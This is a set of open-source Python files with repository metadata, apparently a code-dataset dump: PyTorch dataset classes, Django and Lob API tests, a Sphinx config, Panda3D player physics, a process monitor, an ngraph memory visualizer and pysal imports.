print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | 39.98 | 77 | 0.685093 |
126230cb1bb49c1fa15781cb33a241f9f747890c | 943 | py | Python | old/net/dataset.py | renjunxiang/Word_Segmentation_PyTorch | 47e02745caaf8df7b7a15b0a7342808efd0d5e7e | [
"MIT"
] | 7 | 2019-04-13T16:07:17.000Z | 2022-03-15T06:34:42.000Z | old/net/dataset.py | renjunxiang/Word_Segmentation_PyTorch | 47e02745caaf8df7b7a15b0a7342808efd0d5e7e | [
"MIT"
] | 1 | 2019-12-30T10:21:39.000Z | 2019-12-30T10:21:39.000Z | old/net/dataset.py | renjunxiang/Word_Segmentation_PyTorch | 47e02745caaf8df7b7a15b0a7342808efd0d5e7e | [
"MIT"
] | 4 | 2019-03-25T00:57:34.000Z | 2021-03-17T13:40:40.000Z | import torch
from torch.utils.data import Dataset
from flair.data import Sentence
# 定义数据读取方式
class DatasetRNN(Dataset):
def __init__(self, x_seq, y_seq):
self.x_seq = x_seq
self.y_seq = y_seq
def __getitem__(self, index):
return self.x_seq[index], self.y_seq[index]
def __len__(self):
return len(self.x_seq)
class DatasetBERT(Dataset):
def __init__(self, texts, y_seq, embedding):
self.embedding = embedding
self.texts = texts
self.y_seq = y_seq
def __getitem__(self, index):
text = ' '.join(self.texts[index])
sentence = Sentence(text)
# 数据中有一些表情乱码,bert出现oov
try:
self.embedding.embed(sentence)
x = torch.Tensor([token.embedding.numpy() for token in sentence])
except:
x = torch.Tensor([0])
return x, self.y_seq[index]
def __len__(self):
return len(self.y_seq)
| 24.179487 | 77 | 0.617179 |
10e62bea7ab8ce9590bc8826774a99fe4d538c98 | 783 | py | Python | rainyday/users/tests/test_models.py | bhanuvrat/rainy-day | 34a6b82a08f32a7e230d3434f658d6c271007993 | [
"MIT"
] | null | null | null | rainyday/users/tests/test_models.py | bhanuvrat/rainy-day | 34a6b82a08f32a7e230d3434f658d6c271007993 | [
"MIT"
] | null | null | null | rainyday/users/tests/test_models.py | bhanuvrat/rainy-day | 34a6b82a08f32a7e230d3434f658d6c271007993 | [
"MIT"
] | null | null | null | # Third Party Stuff
from django.test import TestCase
from rainyday.users.models import User
class UserModelTestCase(TestCase):
def test_create_user(self):
u = User.objects.create_user(email='f@F.com', password='abc', first_name="F", last_name='B')
assert u.is_active is True
assert u.is_staff is False
assert u.is_superuser is False
assert u.email == 'f@f.com'
assert u.get_full_name() == 'F B'
assert u.get_short_name() == 'F'
assert str(u) == str(u.id)
def test_create_super_user(self):
u = User.objects.create_superuser(email='f@f.com', password='abc')
assert u.is_active is True
assert u.is_staff is True
assert u.is_superuser is True
assert str(u) == str(u.id)
| 31.32 | 100 | 0.642401 |
aa241c2df04da3f372476f761d541da12dca9327 | 648 | py | Python | tests/test_bulk_intl_verification.py | Kilo59/lob-python | 331ca698c83fab25f0e798839451e4330a79918f | [
"MIT"
] | 56 | 2015-02-05T22:35:09.000Z | 2021-12-21T01:28:48.000Z | tests/test_bulk_intl_verification.py | Kilo59/lob-python | 331ca698c83fab25f0e798839451e4330a79918f | [
"MIT"
] | 123 | 2015-01-10T00:50:55.000Z | 2022-02-23T19:52:54.000Z | tests/test_bulk_intl_verification.py | Kilo59/lob-python | 331ca698c83fab25f0e798839451e4330a79918f | [
"MIT"
] | 45 | 2015-01-30T18:55:28.000Z | 2022-01-20T00:26:32.000Z | import unittest
import os
import lob
class TestBulkIntlVerificationFunctions(unittest.TestCase):
def setUp(self):
lob.api_key = os.environ.get('LOB_API_KEY')
def test_bulk_intl_verification(self):
response = lob.BulkIntlVerification.create(
addresses=[
{
'primary_line': 'deliverable',
'country': 'CA'
}
]
)
addresses = response.addresses
addr = addresses[0]
print(addr)
self.assertEqual(addr.deliverability, 'deliverable')
self.assertEqual(addr.primary_line, '370 WATER ST')
| 25.92 | 60 | 0.580247 |
ebb25f18d0d443f72366389f33a4a4335c0945be | 93 | py | Python | blogposts/apps.py | cesarrodas/cesars-blog | 497f4c20bab24db0c0052004e6199d669dac1fe0 | [
"MIT"
] | null | null | null | blogposts/apps.py | cesarrodas/cesars-blog | 497f4c20bab24db0c0052004e6199d669dac1fe0 | [
"MIT"
] | null | null | null | blogposts/apps.py | cesarrodas/cesars-blog | 497f4c20bab24db0c0052004e6199d669dac1fe0 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class BlogpostsConfig(AppConfig):
name = 'blogposts'
| 15.5 | 33 | 0.763441 |
52370b0dea4fc7b5de0fc1b11a37c5a09eccf733 | 12,792 | py | Python | engine/player/playerPhysics.py | grimfang/rising_reloaded | 5e83b248952dd13204f14d825a45d3da8d6d725b | [
"MIT"
] | 1 | 2016-08-03T16:01:57.000Z | 2016-08-03T16:01:57.000Z | engine/player/playerPhysics.py | grimfang/rising_reloaded | 5e83b248952dd13204f14d825a45d3da8d6d725b | [
"MIT"
] | null | null | null | engine/player/playerPhysics.py | grimfang/rising_reloaded | 5e83b248952dd13204f14d825a45d3da8d6d725b | [
"MIT"
] | null | null | null | #!/usr/bin/python
#----------------------------------------------------------------------#
# The MIT License (MIT)
# See the license.txt for license information
#----------------------------------------------------------------------#
"""@ package BasePhysics
All Physics setups and builders
"""
# System Imports
import logging as log
# Panda Engine Imports
from bulletCharacterController import PandaBulletCharacterController
from panda3d.bullet import BulletGhostNode
from panda3d.bullet import BulletSphereShape
from panda3d.bullet import BulletCylinderShape
from panda3d.bullet import ZUp
from panda3d.core import Vec3, BitMask32, NodePath, Point3, TransformState
from direct.showbase.InputStateGlobal import inputState
# MeoTech Imports
#----------------------------------------------------------------------#
class PlayerPhysics():
"""Handle the player related physics"""
# NOTE: I wonder if these are really a good idea? doing @classmethod....
#@ Fix the player capsule size so that it fits around the player model
@classmethod
def buildCharacterController(cls, _engine, _height, _radius, _pos, _head):
"""Build a basic BulletCharacter Controller"""
np = _engine.BulletObjects["player"].attachNewNode("BCC")
# initialise the Bullet character controller node
char = PandaBulletCharacterController(
_engine.bulletWorld,
np,
_height,
_height * 0.35,
0.02,
_radius)
# now make the character collideable with walls and ground
char.setCollideMask(BitMask32(0x5))
# reparent the actor to our character nodepath, so we don't
# need to keep track of the actualisation ourselfe
#self.character.actor.reparentTo(self.char.movementParent)
# set the character to the start position of the actor,
# as it will hold the startposition of the active level
char.setPos(_pos)
# and set the heading to those of the actor
char.setH(_head)
return char
#@ Fix the size and position of the player ghost
@classmethod
def buildCharacterGhost(cls, _engine, _height, _radius, _bulletBody, _playerModel, _head):
"""Build a basic BulletGhost body for the player to be used for tracking eventObjects"""
shape = BulletSphereShape(_radius*4)
ghost = BulletGhostNode("player_ghost")
ghost.addShape(shape)
ghostNP = _engine.BulletObjects["player"].attachNewNode(ghost)
newz = _playerModel.getPos()
newz.z = newz.z + 2.5
ghostNP.setPos(newz)
ghostNP.setCollideMask(BitMask32.allOff())
_engine.bulletWorld.attachGhost(ghost)
ghostNP.reparentTo(_playerModel)
return ghostNP
@classmethod
def doPlayerJump(cls, player, jumpHeight):
"""Allow the player to perform a jump"""
player.startJump(jumpHeight)
@classmethod
def doPlayerCrouch(cls, player, startCrouching):
"""Allow the player to perform crouch"""
if startCrouching:
player.startCrouch()
else:
player.stopCrouch()
#@ useBasicPlayerMovement: needs cleaning, maybe this causes the movement bug
#@ when you enter the grabMode
@classmethod
def useBasicPlayerMovement(cls, _engine, dt):
"""This sets up a basic movement for the playercontroller"""
# get the player
player = _engine.GameObjects["player"]
speed = Vec3(0, 0, 0)
omega = 0.0
requestAnim = "Idle"
if not player.bulletBody.isOnGround() and player.bulletBody.movementState != "flying":
requestAnim = "Fall"
elif player.groundPosTestTick >= 10:
player.lastGroundPos = player.bulletBody.getPos()
player.groundPosTestTick = 0
else:
player.groundPosTestTick += 1
if inputState.isSet('forward'): speed.setY(player.runSpeed); requestAnim="Run"
if inputState.isSet('reverse'): speed.setY(-player.runSpeed); requestAnim="Walk"
if inputState.isSet('left'): speed.setX(-player.runSpeed); requestAnim="Walk"
if inputState.isSet('right'): speed.setX(player.runSpeed); requestAnim="Walk"
if inputState.isSet('turnLeft'): omega = player.turnSpeed; requestAnim="Walk"
if inputState.isSet('turnRight'): omega = -player.turnSpeed; requestAnim="Walk"
if inputState.isSet('space'): PlayerPhysics.doPlayerJump(player.bulletBody, player.jumpHeight); requestAnim="Jump"
if inputState.isSet('ctrl'): PlayerPhysics.doPlayerCrouch(player)
## In grabState
if player.inGrabMode:
if inputState.isSet('climb'): player.exitGrabMode()
elif inputState.isSet('fall'): player.exitGrabMode(False)
if not player.bulletBody.isOnGround() and player.bulletBody.movementState != "flying":
# as we fall, set the fall animation
if not player.actor.getAnimControl("jump").isPlaying() \
or (player.actor.getAnimControl("jump").isPlaying()
and player.playingAnim == "Fall"):
requestAnim = "Fall"
else:
requestAnim = "Jump"
if omega == 0:
omega = _engine.inputHandler.getMouse(dt)
player.bulletBody.setAngularMovement(omega)
player.bulletBody.setLinearMovement(speed, True)
player.bulletBody.update()
player.requestState(player, requestAnim)
if player.inGrabMode:
rayHit = PlayerPhysics.doRayTest(_engine, player.bulletBody)
if rayHit != None:
speed.setY(0)
player.bulletBody.movementParent.lookAt(player.bulletBody.getPos() - rayHit)
return
@classmethod
def onGhostCollision(cls, _engine, _pBulletGhost, dt):
"""Checks only player ghost contacts"""
# OverLap test for ghosts
ghost = _pBulletGhost.node()
ghostContactTest = _engine.bulletWorld.contactTest(_pBulletGhost.node())
for ghostContact in ghostContactTest.getContacts():
contactNode = ghostContact.getNode1()
contactNodeName = contactNode.getName()
#contactNodeStr = str(ghostContact.getNode1())
#contactNodeList = contactNodeStr.split()
avoidList = ["Ground_plane", "Capsule", "ItemSphere"]
if contactNodeName in avoidList:
if contactNodeName == "Ground_plane":
player = _engine.GameObjects["player"]
player.die()
player.resetPosition()
pass
# While player on ground dont send msg for grab
# only when the player left the ground = jump state, only then check
# for wall/ledges
else:
#print contactNode
"""Tag gets set inside blender along with the isCollisionMesh tag, the tag for the climbeable should only be added to mesh that
are collideable, here we check for the tag, if climbeable, then check for the range if in range (which req a jump to the ledge) we attach the
player to the ledge. (lock the movement into the axis of the mesh.) left/right"""
# For that idea to return the contact object/wall mask
# Get the object/level maybe this is only for the wall masks atm
wallMask = BitMask32(0x8) #_engine.GameObjects["level"][contactNodeName].wallMask
messenger.send("onGhostCollision", [ghostContact, contactNodeName, wallMask])
@classmethod
def onCollision(cls, _engine, _pBulletGhost, _pBulletBody, dt):
"""On a collision get the node and do something with it."""
# Contact test for solids
result = _engine.bulletWorld.contactTest(_pBulletBody.movementParent.node().getChild(0))
for contact in result.getContacts():
if contact.getNode1() in _engine.bulletWorld.getGhosts():
# This works for Items only so far.
if contact.getNode1().getNumChildren() >= 1:
pandaNode = str(contact.getNode1().getChild(0))
pandaNodeList = pandaNode.split()
# Find the correct Name for the item
renderPath = str(render.find('**/'+pandaNodeList[1]))
renderPathList = renderPath.split('/')
bulletType = renderPathList[2]
contactObjectName = renderPathList[4]
#eventType = contactObject.eventType
# We should check into this and make sure it doesnt spam the messenger to much
messenger.send("onItemCollision", [bulletType, contactObjectName])
elif contact.getNode1():
ghostNode = str(contact.getNode1())
ghostNodeList = ghostNode.split()
sensorPath = str(render.find('**/'+ghostNodeList[1]))
sensorPathList = sensorPath.split('/')
if ghostNodeList[1] == 'player_ghost':
pass
elif ghostNodeList[1] in _engine.GameObjects["sensor"]:
#print sensorPathList
bulletType = sensorPathList[2]
contactObjectName = sensorPathList[3]
messenger.send("onSensorCollision", [bulletType, contactObjectName])
else:
print contact.getNode1(), "Not Setup"
break
#># DT_EDGEGRAB ##
elif contact.getNode1():
#print "On WallCollision: \n"
node = contact
bulletNP = str(contact.getNode1())
bulletNPList = bulletNP.split()
nodeName = bulletNPList[2]
# Get some math shit
mpoint = contact.getManifoldPoint()
#print "WALL COLLISION"
#print "Distance: ", mpoint.getDistance()
#print "WorldPos(A): ", mpoint.getPositionWorldOnA()
#print "WorldPos(B): ", mpoint.getPositionWorldOnB()
#print "LocalPoint(A): ", mpoint.getLocalPointA()
#print "LocalPoint(B): ", mpoint.getLocalPointB()
# if "_col" in nodeName: do #Maybe slow??
#messenger.send("onWallCollision", [node, nodeName])
#># DT_EDGEGRAB ##
#@ As mentioned: Add a visual object for debugging the sweeptest movements inside the world
@classmethod
def doSweepTest(cls, _engine, _player, _wallMask, _extras):
print "####> doSweepTest()\n"
#mpoint = _node.getManifoldPoint()
playerPos = _player.bulletBody.getPos()
tsFrom = TransformState.makePos(Point3(playerPos + (0, 0.2, _player.height + 5.0)))
tsTo = TransformState.makePos(Point3(playerPos + (0, 0.2, 0)))
#print "THIS IS THE PLAYER Z:", playerPos.getZ()
rad = 1.5
height = 4.0
mask = BitMask32(0x8) #_wallMask
#shape = BulletCylinderShape(rad, height, ZUp)
penetration = 0.0
shape = BulletSphereShape(rad)
result = _engine.bulletWorld.sweepTestClosest(shape, tsFrom, tsTo, mask, penetration)
#print "Sweep Node: ", result.getNode()
#print "Sweep HitPos: ", result.getHitPos()
#print "Sweep Normal: ", result.getHitNormal()
#print "Sweep Fraction: ", result.getHitFraction()
hitPos = result.getHitPos()
hitNode = result.getNode()
hitNormal = result.getHitNormal()
hitFraction = result.getHitFraction()
# Create a node to attach to
# if flying then be able to right click to attach/grab
avoidList = ["player_ghost", "Capsule"]
#print "THIS IS THE FKING HIT NODE!!! : ", hitNode.getName()
if hitNode.getName() not in avoidList:
return hitPos, hitNode, hitNormal, hitFraction
else:
return None
#@ Fix player heading Ray and Ray height sometimes it misses
@classmethod
def doRayTest(cls, _engine, _player):
#oldTo = _node
#oldTo.setZ(_player.getZ())
pFrom = Point3(_player.getPos(render))
pTo = pFrom + Vec3(0, 1, 0) * 10
result = _engine.bulletWorld.rayTestAll(pFrom, pTo)
for hit in result.getHits():
hitNode = hit.getNode()
hitNormal = hit.getHitNormal()
if hitNode.getName() != "Ground_plane" and hitNode != None:
#print "THIS IS THE RAY NODE: ", hitNode.getName()
return hitNormal
else:
pass
| 38.763636 | 157 | 0.601235 |
ad4afcd9ed8c4d72ccee527e8dc486db2cb79111 | 1,026 | py | Python | monitor_reboot.py | initialstate/pi-process-dashboard | aa1e014ef3cb17d45c05e462f73685855490ee7f | [
"MIT"
] | 309 | 2016-12-12T18:26:18.000Z | 2022-02-11T14:19:49.000Z | monitor_reboot.py | initialstate/pi-process-dashboard | aa1e014ef3cb17d45c05e462f73685855490ee7f | [
"MIT"
] | null | null | null | monitor_reboot.py | initialstate/pi-process-dashboard | aa1e014ef3cb17d45c05e462f73685855490ee7f | [
"MIT"
] | 29 | 2016-12-16T21:53:56.000Z | 2020-09-29T07:01:44.000Z | import psutil
import time
import sys
from ISStreamer.Streamer import Streamer
# --------- User Settings ---------
# Initial State settings
BUCKET_NAME = ":computer: Processes"
BUCKET_KEY = "pr1208"
ACCESS_KEY = "PLACE YOUR INITIAL STATE ACCESS KEY HERE"
PROCESS_NAME = "PLACE THE NAME OF YOUR PROCESS HERE"
# Set the time to wait until you are sure reboot is complete and network connections are restored (i.e. power outage)
MINUTES_DELAY = 5
# ---------------------------------
def main():
# Wait for ntpd to run for sync of the clock
found_ntpd = False
cnt = 0
while found_ntpd == False:
for proc in psutil.process_iter():
if proc.name() == "ntpd":
found_ntpd = True
cnt += 1
if cnt == 60: # assume that ntpd has already run if not found in 60 seconds
found_ntpd=True
time.sleep(1)
time.sleep(60*MINUTES_DELAY)
streamer = Streamer(bucket_name=BUCKET_NAME, bucket_key=BUCKET_KEY, access_key=ACCESS_KEY)
streamer.log(PROCESS_NAME,"Exited")
streamer.flush()
if __name__ == "__main__":
main() | 29.314286 | 117 | 0.69883 |
c0bb0024d29ba0ce2e397cc5b347b1dca067f083 | 9,097 | py | Python | docs/conf.py | transientlunatic/otter | e6be6ab454474a04c3d2c6abf8f7848079642f38 | [
"0BSD"
] | null | null | null | docs/conf.py | transientlunatic/otter | e6be6ab454474a04c3d2c6abf8f7848079642f38 | [
"0BSD"
] | null | null | null | docs/conf.py | transientlunatic/otter | e6be6ab454474a04c3d2c6abf8f7848079642f38 | [
"0BSD"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# otter documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import kentigern
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import otter
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Otter'
copyright = u'2018, Daniel Williams'
author = u"Daniel Williams"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = ".".join(otter.__version__.split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = otter.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'default'
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'default'
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
html_theme = 'kentigern'
templates_path = ['_templates']
html_static_path = ["_static"]
else:
#sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../otter'))
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
html_sidebars = {'**': ['localtoc.html', 'sourcelink.html', 'searchbox.html']}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'otterdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'otter.tex',
u'Otter Documentation',
u'Daniel WIlliams', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'otter',
u'Otter Documentation',
[u'Daniel WIlliams'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'otter',
u'Otter Documentation',
u'Daniel WIlliams',
'otter',
'Otter is a report generation tool for Python.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 30.733108 | 78 | 0.707926 |
7d4decb4bb79a1d91bf20c2a2d836d6e3e7a0448 | 8,345 | py | Python | ngraph/transformers/passes/visualizemem.py | NervanaSystems/ngraph-python | ac032c83c7152b615a9ad129d54d350f9d6a2986 | [
"Apache-2.0"
] | 18 | 2018-03-19T04:16:49.000Z | 2021-02-08T14:44:58.000Z | ngraph/transformers/passes/visualizemem.py | rsumner31/ngraph | 5e5c9bb9f24d95aee190b914dd2d44122fc3be53 | [
"Apache-2.0"
] | 2 | 2019-04-16T06:41:49.000Z | 2019-05-06T14:08:13.000Z | ngraph/transformers/passes/visualizemem.py | rsumner31/ngraph | 5e5c9bb9f24d95aee190b914dd2d44122fc3be53 | [
"Apache-2.0"
] | 11 | 2018-06-16T15:59:08.000Z | 2021-03-06T00:45:30.000Z | # ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
from __future__ import division
from ngraph.transformers.passes.passes import GraphPass
class VisualizeMemPass(GraphPass):
def __init__(self, filename='mem.html'):
self.filename = filename
def do_pass(self, computation_decl, **kwargs):
self.computation_decl = computation_decl
with open(self.filename, 'w') as file:
file.truncate()
file.write('<!DOCTYPE html>\n<html>\n')
file.write('<head>\n')
file.write(' <style>\n')
file.write(' th, td {\n')
file.write(' border-bottom: 1px solid #ddd;\n')
file.write(' width: 200px;\n')
file.write(' }\n')
file.write(' table, td, th {\n')
# file.write(' border: 1px solid #ddd;\n')
# file.write(' text-align: left;\n')
file.write(' }\n')
file.write(' table {\n')
file.write(' border-collapse: collapse;\n')
# file.write(' width: 100%;\n')
file.write(' }\n')
# file.write(' tr:hover {background-color: #f5f5f5}\n')
file.write(' tr:nth-child(even) {background-color: #f2f2f2}\n')
file.write(' </style>\n')
file.write('</head>\n')
file.write('<body>\n')
tensors = set()
temp_max_size = 0
for node in computation_decl.exop_block:
tensors |= set(node.liveness_live_list)
for tensor in tensors:
if tensor.is_persistent is False:
temp_max_size += tensor.size
file.write('<table>\n')
file.write(
'<tr><td>Persistent Memory Footprint</td><td align="right">{:,}</td></tr>\n'
.format(computation_decl.exop_block.persistent_size()))
file.write(
'<tr><td>Temporary Memory Footprint</td><td align="right">{:,}</td></tr>\n'
.format(computation_decl.exop_block.memory_footprint()))
file.write(
'<tr><td>Max temporary Memory Footprint</td><td align="right">{:,}</td></tr>\n'
.format(temp_max_size))
file.write('</table>\n')
file.write('<hr>\n')
self.draw_tensor_weight(file)
# file.write('<hr>\n')
# self.draw_op_influence(file)
file.write('<hr>\n')
self.draw_histogram(file)
# file.write('<hr>\n')
file.write('</body>\n</html>\n')
def find_largest_op(self):
largest_op = None
largest_size = 0
for i, exop in enumerate(self.computation_decl.exop_block):
size = 0
for tensor in exop.liveness_live_list:
size += tensor.size
if size > largest_size:
largest_size = size
largest_op = exop
return largest_op
def draw_tensor_weight(self, file):
largest_op = self.find_largest_op()
if largest_op is not None:
largest_live = set()
for tensor in largest_op.liveness_live_list:
largest_live.add(tensor)
age_list = dict()
tensor_set = set()
generator_op = dict()
file.write('<table>\n')
file.write(' <tr>')
file.write('<th align="left">tensor</th>')
file.write('<th align="right">size</th>')
file.write('<th align="right">age</th>')
file.write('<th align="right">generator weight</th>')
file.write('</tr>\n')
for i, exop in enumerate(self.computation_decl.exop_block):
for tensor in exop.liveness_new_list:
age_list[tensor] = i
generator_op[tensor] = exop
for tensor in exop.liveness_free_list:
start = age_list[tensor]
age_list[tensor] = (i - start)
tensor_set.add(tensor)
for tensor in sorted(list(tensor_set), reverse=True, key=lambda tensor: tensor.size):
generator_weight = self.compute_op_weight(generator_op[tensor])
if tensor in largest_live:
file.write(' <tr style="background-color: #f0c0f0">')
else:
file.write(' <tr>')
file.write('<td>{}</td>'.format(tensor.tensor_description_base.name))
file.write('<td align="right">{:,}</td>'.format(tensor.size))
file.write('<td align="right">{}</td>'.format(age_list[tensor]))
file.write('<td align="right">{}</td>'.format(generator_weight))
file.write('</tr>\n')
file.write('</table>\n')
def draw_histogram(self, file):
stroke_width = 14
text_offset = 4
offset = 200
width = 1000
scale = width - offset
line_spacing = stroke_width * 1.5
line_count = 0
for _ in self.computation_decl.exop_block:
line_count += 1
height = line_count * line_spacing + stroke_width
memory_footprint = max(1, float(self.computation_decl.exop_block.memory_footprint()))
file.write('<svg viewBox="0 0 {} {}">\n'.format(width, height))
y = 0
for i, node in enumerate(self.computation_decl.exop_block):
usage = float(node.memory_usage())
footprint = float(node.memory_footprint())
y += line_spacing
x1 = offset
x2 = ((usage / memory_footprint) * scale) + offset
file.write('<text x="{}" y="{}" fill="{}">{}</text>\n'.format(
0, y + text_offset, "black", node.name
))
file.write('<line x1="{}" y1="{}" x2="{}" y2="{}"'
' style="stroke:{};stroke-width:{}" />\n'
.format(x1, y, x2, y, "forestgreen", stroke_width))
x1 = x2
x2 = ((footprint / memory_footprint) * scale) + offset
file.write('<line x1="{}" y1="{}" x2="{}" y2="{}"'
' style="stroke:{};stroke-width:{}" />\n'
.format(x1, y, x2, y, "firebrick", stroke_width))
file.write('</svg>\n')
def draw_op_influence(self, file):
file.write('<table>\n')
file.write(' <tr>')
file.write('<th align="left">op</th>')
file.write('<th align="right">influence</th>')
file.write('</tr>\n')
for exop in self.computation_decl.exop:
weight = self.compute_op_weight(exop)
file.write(' <tr>')
file.write('<td>{}</td>'.format(exop.name))
file.write('<td align="right">{:,}</td>'.format(weight))
file.write('</tr>\n')
def compute_op_weight(self, exop):
mass = 0
# for input_decl in exop.input_decls:
# tensor = input_decl.source_output_decl.tensor
# if tensor.is_persistent is False:
# mass += tensor.size
# for output_decl in exop.output_decls:
# tensor = output_decl.tensor
# if tensor.is_persistent is False:
# mass -= tensor.size
for tensor in exop.liveness_new_list:
if tensor.is_persistent is False:
mass += tensor.size
for tensor in exop.liveness_free_list:
if tensor.is_persistent is False:
mass -= tensor.size
return mass
| 42.576531 | 97 | 0.520791 |
8505f51b6d6b623ee272452971cb64640edc4996 | 23,199 | py | Python | pysal/model/spreg/twosls_regimes.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | 1 | 2021-08-16T02:47:35.000Z | 2021-08-16T02:47:35.000Z | pysal/model/spreg/twosls_regimes.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | null | null | null | pysal/model/spreg/twosls_regimes.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | 1 | 2016-11-11T19:20:51.000Z | 2016-11-11T19:20:51.000Z | import numpy as np
from . import regimes as REGI
from . import user_output as USER
import multiprocessing as mp
import scipy.sparse as SP
